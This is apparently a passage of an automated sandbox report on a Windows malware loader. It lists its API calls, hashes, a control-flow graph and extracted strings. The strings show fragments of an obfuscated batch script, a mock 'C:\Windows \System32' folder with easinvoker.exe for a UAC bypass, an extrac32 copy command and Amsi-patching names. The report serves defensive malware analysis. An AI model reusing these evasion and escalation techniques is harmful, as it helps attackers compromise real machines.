                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CheckConnectionInternet
                                                                                        • String ID: Initialize$OpenSession$ScanBuffer
                                                                                        • API String ID: 3847983778-3852638603
                                                                                        • Opcode ID: 399747baea58aa9ad0b37fe602ca9dcdf76c7ee14275051cf908b447634213d5
                                                                                        • Instruction ID: 232f92507ccf48d2e0878abde7960b90dde944bb50f8554f8a97beba0425ead4
                                                                                        • Opcode Fuzzy Hash: 399747baea58aa9ad0b37fe602ca9dcdf76c7ee14275051cf908b447634213d5
                                                                                        • Instruction Fuzzy Hash: FB410031B642499FEB20EBA4D855EEEB3F6EF88715F604426E041B7350EA74AD058F60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D7C3F6 Relevance: 6.1, APIs: 4, Instructions: 81nativefileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 02D64EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02D64EF2
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D7C4CA), ref: 02D7C437
                                                                                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D7C471
                                                                                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D7C49E
                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D7C4A7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3764614163-0
                                                                                        • Opcode ID: d833fbb6e1e79520c1ccf49dabcab13dd4e971f5194df6a05d3b13d97bcfcb2a
                                                                                        • Instruction ID: 7a23c3f6621696bc6116e22a02645a374959414ef6f909142b700211b7daca42
                                                                                        • Opcode Fuzzy Hash: d833fbb6e1e79520c1ccf49dabcab13dd4e971f5194df6a05d3b13d97bcfcb2a
                                                                                        • Instruction Fuzzy Hash: F921B371A50208BFEB20DBA4DC46FEEB7BDEB04714F514466B604F72D0E6B46E048A64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D7C3F8 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 02D64EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02D64EF2
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D7C4CA), ref: 02D7C437
                                                                                        • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D7C471
                                                                                        • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D7C49E
                                                                                        • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D7C4A7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3764614163-0
                                                                                        • Opcode ID: e0340b50de51c17d32799b1bfddfb1d616d6d9859abb7fd4bfc74bf618f37741
                                                                                        • Instruction ID: 251377376822ad00012a5e0e72c25e79bc38f56aa910a6d731ce0cc7c1209f08
                                                                                        • Opcode Fuzzy Hash: e0340b50de51c17d32799b1bfddfb1d616d6d9859abb7fd4bfc74bf618f37741
                                                                                        • Instruction Fuzzy Hash: 0F21B371A50208BFEB20DB94DC46FEEB7BDEB04714F514466B604B72D0E6B46E048A64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D7C368 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 02D64EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 02D64EF2
                                                                                        • RtlInitUnicodeString.N(?,?,00000000,02D7C3E2), ref: 02D7C390
                                                                                        • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D7C3E2), ref: 02D7C3A6
                                                                                        • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D7C3E2), ref: 02D7C3C5
                                                                                          • Part of subcall function 02D64C24: SysFreeString.OLEAUT32(02D7D42C), ref: 02D64C32
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                        • String ID:
                                                                                        • API String ID: 1694942484-0
                                                                                        • Opcode ID: 76c514489836fa29c099d27321d39258502a5dbd56c48bb4459f660f6b153d56
                                                                                        • Instruction ID: 9abb64f9f6860c55068cf6275eaedd775122c0835f7aadce8c5db03918573ff7
                                                                                        • Opcode Fuzzy Hash: 76c514489836fa29c099d27321d39258502a5dbd56c48bb4459f660f6b153d56
                                                                                        • Instruction Fuzzy Hash: 2801E175950208AFDB11EBA0CD41FDEB3EDEB48700F514462A641E6290EA74AF048B79
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D76D84 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 02D76D28: CLSIDFromProgID.OLE32(00000000,?,00000000,02D76D75,?,?,?,00000000), ref: 02D76D55
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,02D76E68,00000000,00000000,02D76DE7,?,00000000,02D76E57), ref: 02D76DD3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFromInstanceProg
                                                                                        • String ID:
                                                                                        • API String ID: 2151042543-0
                                                                                        • Opcode ID: 5f64dcad766a76666e42ca0d74a52eaa6778b81ced9369e9e704f1548c4595f1
                                                                                        • Instruction ID: f1861b61ccd9c8a9040c2ae7db5b1dda78f658c402cdac71fe75031dea4cd334
                                                                                        • Opcode Fuzzy Hash: 5f64dcad766a76666e42ca0d74a52eaa6778b81ced9369e9e704f1548c4595f1
                                                                                        • Instruction Fuzzy Hash: 1201B170214B04AFEB05DF61EC1286B7BADD749B10F914435F501D2740F678DD14C9B0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D81AC0 Relevance: 46.7, APIs: 2, Strings: 23, Instructions: 2959sleepprocessCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                          • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                          • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                          • Part of subcall function 02D7C3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D7C4CA), ref: 02D7C437
                                                                                          • Part of subcall function 02D7C3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D7C471
                                                                                          • Part of subcall function 02D7C3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02D7C49E
                                                                                          • Part of subcall function 02D7C3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02D7C4A7
                                                                                          • Part of subcall function 02D67E18: GetFileAttributesA.KERNEL32(00000000,?,02D7E0EE,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,UacInitialize), ref: 02D67E23
                                                                                        • Sleep.KERNEL32(00001770,UacScan,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC), ref: 02D83094
                                                                                          • Part of subcall function 02D7C368: RtlInitUnicodeString.N(?,?,00000000,02D7C3E2), ref: 02D7C390
                                                                                          • Part of subcall function 02D7C368: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02D7C3E2), ref: 02D7C3A6
                                                                                          • Part of subcall function 02D7C368: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02D7C3E2), ref: 02D7C3C5
                                                                                        • WinExec.KERNEL32(00000000,02D89524), ref: 02D8436D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FilePath$NameName_$AddressAttributesCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
                                                                                        • String ID: .url$@echo offset "Nnqr=set "%Nnqr%"njyC=="%Nnqr%"qkMvMLsfma%njyC%http"%Nnqr%"dbvWEsxWns%njyC%rem "%Nnqr%"NpzRZtRBVV%njyC%Cloa"%Nnqr%"ftNVZzSZxa%njyC%/Bat"%Nnqr%"TwupSEtIWD%njyC%gith"%Nnqr%"yIGacXULig%njyC%k"%Nnqr%"uGlGnqCSun%njyC%h2sh"%Nnqr%"FU$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$a.bat$er.e$s.d
                                                                                        • API String ID: 102611719-2667577771
                                                                                        • Opcode ID: 645c4068d8fc5ae514ef658b8e45e4bb9f6d17645dbd97ea75a5ed068c7d65ef
                                                                                        • Instruction ID: 82a2c178949a27a0657139d8ea807b5013532ec91813464b36a204da92ee6fa5
                                                                                        • Opcode Fuzzy Hash: 645c4068d8fc5ae514ef658b8e45e4bb9f6d17645dbd97ea75a5ed068c7d65ef
                                                                                        • Instruction Fuzzy Hash: 3053F235B5025A8BEB20FB64DC94EED73B6EB85300F5085A6E009E7354DE70AE85CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D84EFE Relevance: 18.4, APIs: 2, Strings: 8, Instructions: 941processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 10531 2d84efe-2d853da call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d64964 call 2d64698 call 2d7d318 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 10668 2d853e0-2d8565b call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d648b0 10531->10668 10669 2d853db call 2d77be8 10531->10669 10742 2d86190-2d8638f call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d648b0 10668->10742 10743 2d85661-2d85cb3 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d647b0 call 2d64964 WinExec call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64964 call 2d64698 call 2d79e70 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d63694 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 10668->10743 10669->10668 10861 2d86b54-2d86cd7 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d648b0 10742->10861 10862 2d86395-2d869b4 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d62ee0 call 2d62f08 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 GetCurrentProcess call 2d77968 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 10742->10862 11306 2d85cba-2d85f98 call 2d75aa8 call 2d64b90 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d649bc RtlMoveMemory call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d7a1c0 call 2d636c4 10743->11306 11307 2d85cb5-2d85cb8 10743->11307 10995 2d874a8-2d88b96 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 * 16 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64698 * 2 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 ExitProcess 10861->10995 10996 2d86cdd-2d86cec call 2d648b0 10861->10996 11562 2d869bb-2d86b4f call 2d649bc call 2d7c5bc call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 EnumSystemLocalesA 10862->11562 11563 2d869b6-2d869b9 10862->11563 10996->10995 11008 2d86cf2-2d86fc5 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d7d198 call 2d64824 call 2d64964 call 2d64698 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d67e18 10996->11008 11332 2d86fcb-2d8729d call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d7c74c call 2d644f4 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64da4 * 2 call 2d64728 call 2d7c3f8 11008->11332 11333 2d872a2-2d874a3 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d64824 call 2d64964 call 2d64698 call 2d647b0 call 2d64964 call 2d64698 call 2d77be8 call 2d649bc call 2d77f48 11008->11333 11307->11306 11332->11333 11333->10995 11562->10861 11563->11562
                                                                                        APIs
                                                                                          • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                          • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                          • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                          • Part of subcall function 02D7D318: RegOpenKeyA.ADVAPI32(?,00000000,02DC5798), ref: 02D7D35C
                                                                                          • Part of subcall function 02D7D318: RegSetValueExA.ADVAPI32(00000870,00000000,00000000,00000001,00000000,0000001C,00000000,02D7D3C7), ref: 02D7D394
                                                                                          • Part of subcall function 02D7D318: RegCloseKey.ADVAPI32(00000870,00000870,00000000,00000000,00000001,00000000,0000001C,00000000,02D7D3C7), ref: 02D7D39F
                                                                                        • WinExec.KERNEL32(00000000,00000000), ref: 02D857F9
                                                                                          • Part of subcall function 02D79E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 02D79F33
                                                                                        • RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC), ref: 02D85D7B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                                                        • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                        • API String ID: 897696978-872072817
                                                                                        • Opcode ID: 070156a43ed0fb63c1ae43880aa9f874e9ebe50adc2f8e6b534214d104ae73dc
                                                                                        • Instruction ID: 1297ef599c94d7841e79edd466672fc31f541c3b41011b7a1b5ea23e176da9b8
                                                                                        • Opcode Fuzzy Hash: 070156a43ed0fb63c1ae43880aa9f874e9ebe50adc2f8e6b534214d104ae73dc
                                                                                        • Instruction Fuzzy Hash: 04921034A402998FDB24EBA4DC94EEDB3B7EB45300F5084E6E149E7354DA70AE85CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02D61724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
